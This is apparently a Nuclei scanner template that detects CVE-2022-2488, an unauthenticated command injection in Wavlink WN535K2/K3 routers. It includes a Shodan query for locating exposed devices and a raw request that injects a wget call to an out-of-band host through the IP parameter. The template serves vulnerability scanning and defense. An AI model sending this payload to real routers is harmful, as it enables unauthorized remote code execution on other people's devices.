id: CVE-2022-2488 info: name: Wavlink WN535K2/WN535K3 - OS Command Injection author: For3stCo1d severity: critical description: | Wavlink WN535K2 and WN535K3 routers are susceptible to OS command injection in /cgi-bin/touchlist_sync.cgi via manipulation of the argument IP. An attacker can execute malware, obtain sensitive information, modify data, and/or gain full control over a compromised system without entering necessary credentials. remediation: | Apply the latest firmware update provided by the vendor to mitigate this vulnerability. reference: - https://github.com/1angx/webray.com.cn/blob/main/Wavlink/Wavlink%20touchlist_sync.cgi.md - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-2488 - https://vuldb.com/?id.204539 - https://nvd.nist.gov/vuln/detail/CVE-2022-2488 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2022-2488 cwe-id: CWE-78 epss-score: 0.97387 epss-percentile: 0.99886 cpe: cpe:2.3:o:wavlink:wl-wn535k2_firmware:-:*:*:*:*:*:*:* metadata: verified: true max-request: 1 vendor: wavlink product: wl-wn535k2_firmware shodan-query: http.title:"Wi-Fi APP Login" tags: cve,cve2022,iot,wavlink,router,rce,oast http: - raw: - | GET /cgi-bin/touchlist_sync.cgi?IP=;wget+http://{{interactsh-url}}; HTTP/1.1 Host: {{Hostname}} matchers-condition: and matchers: - type: word part: interactsh_protocol # Confirms the HTTP Interaction words: - "http" - type: status status: - 500 # digest: 4a0a00473045022022412fb5f08d6f942fea29ac0bf83c32dcc10b1add318fe88062028d6b8f4b89022100ef8559354d3ad74376d287473d8a2bc658570453a7135badf78559159d2a78fb:922c64590222798bb761d5b6d8e72950